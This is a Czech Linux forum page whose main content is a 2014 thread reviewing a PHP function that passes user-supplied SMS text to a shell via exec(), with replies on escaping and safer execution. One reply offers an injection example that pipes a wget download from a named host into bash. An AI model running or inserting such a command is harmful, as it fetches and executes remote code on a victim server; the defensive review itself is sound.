abclinuxu.cz AbcLinuxu.cz itbiz.cz ITBiz.cz HDmag.cz HDmag.cz abcprace.cz AbcPráce.cz
AbcLinuxu hledá autory!
Inzerujte na AbcPráce.cz od 950 Kč
Rozšířené hledání
×
včera 21:55 | Komunita

Nadace pro svobodný software (FSF) oznámila aktualizaci seznamu prioritních oblastí (changelog), na které by se měli vývojáři a příznivci svobodného softwaru zaměřit. Jsou to například svobodný operační systém pro chytré telefony, hlasová a video komunikace nebo softwarový inteligentní osobní asistent.

Ladislav Hagara | Komentářů: 1
včera 16:44 | Nová verze

Byla vydána verze 2.0.0 knihovny pro vykreslování grafů v programovacím jazyce Python Matplotlib (Wikipedie, GitHub). Přehled novinek a galerie grafů na stránkách projektu.

Ladislav Hagara | Komentářů: 0
včera 15:33 | Komunita

V australském Hobartu probíhá tento týden konference linux.conf.au 2017. Na programu je celá řada zajímavých přednášek. Sledovat je lze online.

Ladislav Hagara | Komentářů: 0
včera 10:20 | Zajímavý článek

Pavel Tišnovský se v dvoudílném článku na MojeFedora.cz věnuje bitmapovým (rastrovým) grafickým editorům ve Fedoře. V prvním dílu se věnuje editorům MyPaint, MtPaint, Pinta, XPaint, Krita a GIMP. V pokračování pak editorům GNU Paint (gpaint), GrafX2, KolourPaint, KIconEdit a Tux Paint.

Ladislav Hagara | Komentářů: 1
16.1. 17:11 | Komunita

Byl proveden bezpečnostní audit svobodného IMAP a POP3 serveru Dovecot (Wikipedie). Audit byl zaplacen z programu Mozilla Secure Open Source a provedla jej společnost Cure53. Společnost Cure53 byla velice spokojena s kvalitou zdrojových kódu. V závěrečné zprávě (pdf) jsou zmíněny pouze 3 drobné a v upstreamu již opravené bezpečnostní chyby.

Ladislav Hagara | Komentářů: 0
16.1. 15:30 | IT novinky

Nadace Raspberry Pi představila na svém blogu Raspberry Pi Compute Module 3 (CM3 a CM3L), tj. zmenšené Raspberry Pi vhodné nejenom pro průmyslové využití. Jedná se o nástupce Raspberry Pi Compute Module (CM1) představeného v dubnu 2014. Nový CM3 vychází z Raspberry Pi 3 a má tedy dvakrát více paměti a desetkrát větší výkon než CM1. Verze CM3L (Lite) je dodávána bez 4 GB eMMC flash paměti. Uživatel si může připojit svou vlastní. Představena byla

… více »
Ladislav Hagara | Komentářů: 1
16.1. 01:23 | Nová verze

Oficiálně bylo oznámeno vydání verze 3.0 multiplatformního balíku svobodných kancelářských a grafických aplikací Calligra (Wikipedie). Větev 3 je postavena na KDE Frameworks 5 a Qt 5. Krita se osamostatnila. Z balíku byly dále odstraněny aplikace Author, Brainstorm, Flow a Stage. U Flow a Stage se předpokládá jejich návrat v některé z budoucích verzí Calligry.

Ladislav Hagara | Komentářů: 7
15.1. 15:25 | Nová verze

Bylo oznámeno vydání první RC (release candidate) verze instalátoru pro Debian 9 s kódovým názvem Stretch. Odloženo bylo sloučení /usr jako výchozí nastavení v debootstrap. Vydán byl také Debian 8.7, tj. sedmá opravná verze Debianu 8 s kódovým názvem Jessie.

Ladislav Hagara | Komentářů: 6
15.1. 13:37 | Zajímavý projekt

1. ledna byl představen projekt Liri (GitHub). Jedná se o spojení projektů Hawaii, Papyros a původního projektu Liri s cílem vyvíjet operační systém (linuxovou distribuci) a aplikace s moderním designem a funkcemi. Včera byl představen Fluid 0.9.0 a také Vibe 0.9.0. Jedná se o toolkit a knihovnu pro vývoj multiplatformních a responzivních aplikací podporující Material Design (Wikipedie) a volitelně také Microsoft Design Language (designový jazyk Microsoft) [reddit].

Ladislav Hagara | Komentářů: 8
14.1. 00:33 | Zajímavý software

Google na svém blogu věnovaném open source představil knihovnu pro komprimaci a dekomprimaci 3D grafiky s názvem Draco. Knihovna bude využívána například v aplikacích pro virtuální a rozšířenou realitu. Porovnání Draco s gzip na YouTube. Zdrojové kódy Draco jsou k dispozici na GitHubu pod licencí Apache 2.0.

Ladislav Hagara | Komentářů: 5
Jak se stavíte k trendu ztenčování přenosných zařízení (smartphony, notebooky)?
 (10%)
 (2%)
 (75%)
 (3%)
 (10%)
Celkem 304 hlasů
 Komentářů: 24, poslední včera 10:14
    Rozcestník
    Reklama

    Dotaz: Skontrolujte mi prosím bezpečnosť funkcie

    11.12.2014 18:50 Peter
    Skontrolujte mi prosím bezpečnosť funkcie
    Přečteno: 400×
    Dobrý deň vám prajem.

    Veľmi sprostá otázka a prosba, ale istota je guľomet. Budete taký dobrý a môžete mi skontrolovať prosím či táto funkcia nemá nejakú bezpečnostnú dieru, proste či nejakým spôsobom môže útočník zneužiť bash (keďže samozrejme vstup $Number a $Message je priamo od používateľa):
    function smssend($Number,$Message) {                                                                                                                                 
      $Recode=array('ä'=>'a','Ä'=>'A','á'=>'a','Á'=>'A','à'=>'a','À'=>'A','ã'=>'a','Ã'=>'A','â'=>'a','Â'=>'A','č'=>'c','Č'=>'C','ć'=>'c','Ć'=>'C',                       
                    'ď'=>'d','Ď'=>'D','ě'=>'e','Ě'=>'E','é'=>'e','É'=>'E','ë'=>'e','Ë'=>'E','è'=>'e','È'=>'E','ê'=>'e','Ê'=>'E','í'=>'i','Í'=>'I',                       
                    'ï'=>'i','Ï'=>'I','ì'=>'i','Ì'=>'I','î'=>'i','Î'=>'I','ľ'=>'l','Ľ'=>'L','ĺ'=>'l','Ĺ'=>'L','ń'=>'n','Ń'=>'N','ň'=>'n','Ň'=>'N',                       
                    'ñ'=>'n','Ñ'=>'N','ó'=>'o','Ó'=>'O','ö'=>'o','Ö'=>'O','ô'=>'o','Ô'=>'O','ò'=>'o','Ò'=>'O','õ'=>'o','Õ'=>'O','ő'=>'o','Ő'=>'O',                       
                    'ř'=>'r','Ř'=>'R','ŕ'=>'r','Ŕ'=>'R','š'=>'s','Š'=>'S','ś'=>'s','Ś'=>'S','ť'=>'t','Ť'=>'T','ú'=>'u','Ú'=>'U','ů'=>'u','Ů'=>'U',                       
                    'ü'=>'u','Ü'=>'U','ù'=>'u','Ù'=>'U','ũ'=>'u','Ũ'=>'U','û'=>'u','Û'=>'U','ý'=>'y','Ý'=>'Y','ž'=>'z','Ž'=>'Z','ź'=>'z','Ź'=>'Z');                      
      exec('smssend '.preg_replace('/[^0-9]/','',$Number).' "'.preg_replace('/[^0-9a-zA-Z\+\-\*\/\.\,\:\; ]/','',strtr($Message,$Recode)).'"');                          
    }
    
    Vopred vám veľmi pekne ďakujem za ochotu.

    Řešení dotazu:


    Odpovědi

    Fuky avatar 11.12.2014 22:11 Fuky | skóre: 52 | blog: 4u
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie

    Pro převod na ASCII bych využíval standartní funkce dostupné v konkrétním prostředí:

    PHP

    setlocale(LC_CTYPE, 'cs_CZ');
    echo iconv('UTF-8', 'ASCII//TRANSLIT', "Příšerně žluťoučký kůň úpěl ďábelské ódy.");

    Bash

    $ echo "Příšerně žluťoučký kůň úpěl ďábelské ódy." |enca -C extern -E cstocs -x ascii -L cs_CZ
    Priserne zlutoucky kun upel dabelske ody.

    Python

    $ echo "Příšerně žluťoučký kůň úpěl ďábelské ódy." |python -c 'import sys, unicodedata; print unicodedata.normalize("NFKD", sys.stdin.read().decode("utf-8")).encode("ascii", "ignore")'
    Priserne zlutoucky kun upel dabelske ody.

    Co se týče zneužití fce exec(), tak mě na první pohled nic nenapadá.

    Fuky avatar 11.12.2014 22:28 Fuky | skóre: 52 | blog: 4u
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Josef Kufner avatar 12.12.2014 01:10 Josef Kufner | skóre: 66
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Na volání shellu je nutné zadávané hodnoty escapovat, podobně jako v SQL. Použij funkci escapeshellarg:
    exec('smssend '.escapeshellarg($number).' '.escapeshellarg($message));
    Hello world ! Segmentation fault (core dumped)
    Fuky avatar 12.12.2014 09:41 Fuky | skóre: 52 | blog: 4u
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie

    Podívej se na:

    ' "'.preg_replace('/[^0-9a-zA-Z\+\-\*\/\.\,\:\; ]/','',strtr($Message,$Recode)).'"'

    Řekl bych, že tazatel si uvědomuje podstatu problému a zná fci escapeshellarg(), ale chce mít ve zprávě potencionálně nebezpečné znaky '*', ';' bez zpětného lomítka. A mě nenapadá, jak je v té jeho konstrukci zneužít, když začíná a končí řetězec pomocí uvozovek a zároveň podle mě nenechal k dispozici žádný znak, který by umožnil řetězec ukončit ze strany uživatele a provést spuštění vlastního příkazu. Nebo tě napadá nějaká konkrétní možnost zneužití?

    Fuky avatar 12.12.2014 09:50 Fuky | skóre: 52 | blog: 4u
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie

    Teď mě napadá, tazatel ještě nezmínil jaké argumenty umožňuje přijímat program smssend, mmj. bych omezil velikost uživatelského vstupu na maximální požadovanou velikost zprávy.

    Security issues with using PHP's escapeshellarg
    Breaking escapeshellarg() news

    12.12.2014 15:30 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    A proto je nejlepší shell z toho celého cirkusu vynechat. Obzvlášť, když netuší, jaký shell se vůbec použije (od toho se odvíjí escapovaní). Ten programovací jazyk (PHP?) nemá funkci na execve(2)?
    Josef Kufner avatar 12.12.2014 17:31 Josef Kufner | skóre: 66
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Má: pcntl_exec. A máš pravdu, je to mnohem lepší řešení, jen to má takový drobný nedostatek: execve ani pcntl_exec neprohledává $PATH, což je celkem otrava.

    Navíc pokud chceš pracovat s stdio onoho programu, je lepší použít funkci proc_open, která umí přesměrovávat všechny filedescriptory dle libosti. Ale tady se zas použije shell a s tím je potřeba i escapovat argumenty.
    Hello world ! Segmentation fault (core dumped)
    12.12.2014 19:09 petr_p | skóre: 59 | blog: pb
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Drobný nedostatek lze řešit posixovým execvp(3). (Jen je třeba pamatovat, že za neexistence proměnné PATH je chování nedefinováno; například glibc se pak dívá do pracovního adresáře.)
    12.12.2014 15:38 pet
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    V tom $Recode ti chybí mnoho znaků, např. ç a Ç. Použij raději standartní funkce jak doporučuje Fuky výše.
    Jendа avatar 13.12.2014 00:38 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Není, escapuješ diakritiku, ale já ti tam můžu napsat zprávu "; wget backdoor.hrach.eu -q -O - | bash;" a je to.
    „To jsem nedávno zjistil, že naše televize jde ovládat po síti. Docela mě to překvapilo.“ „Jo? A kdo vám ji ovládal?“
    13.12.2014 01:12 z
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    A je co? Prdlačky.
    Jendа avatar 13.12.2014 01:44 Jendа | skóre: 73 | blog: Výlevníček | JO70FB
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Aha, dělá ještě preg_replace.

    Doporučil bych to ale dělat naopak, tj. mít seznam povolených znaků, nikoli zakázaných. (no a nebo nejlíp ty jiné metody spouštění příkazu, které jsou výše)
    „To jsem nedávno zjistil, že naše televize jde ovládat po síti. Docela mě to překvapilo.“ „Jo? A kdo vám ji ovládal?“
    Fuky avatar 13.12.2014 09:22 Fuky | skóre: 52 | blog: 4u
    Rozbalit Rozbalit vše Re: Skontrolujte mi prosím bezpečnosť funkcie
    Zkus se podívat podrobněji na to co skutečně dělá kód tazatele a pak přehodnoť text svých příspěvků. ;-)

    Založit nové vláknoNahoru

    Tiskni Sdílej: Linkuj Jaggni to Vybrali.sme.sk Google Del.icio.us Facebook

    ISSN 1214-1267   www.czech-server.cz
    © 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.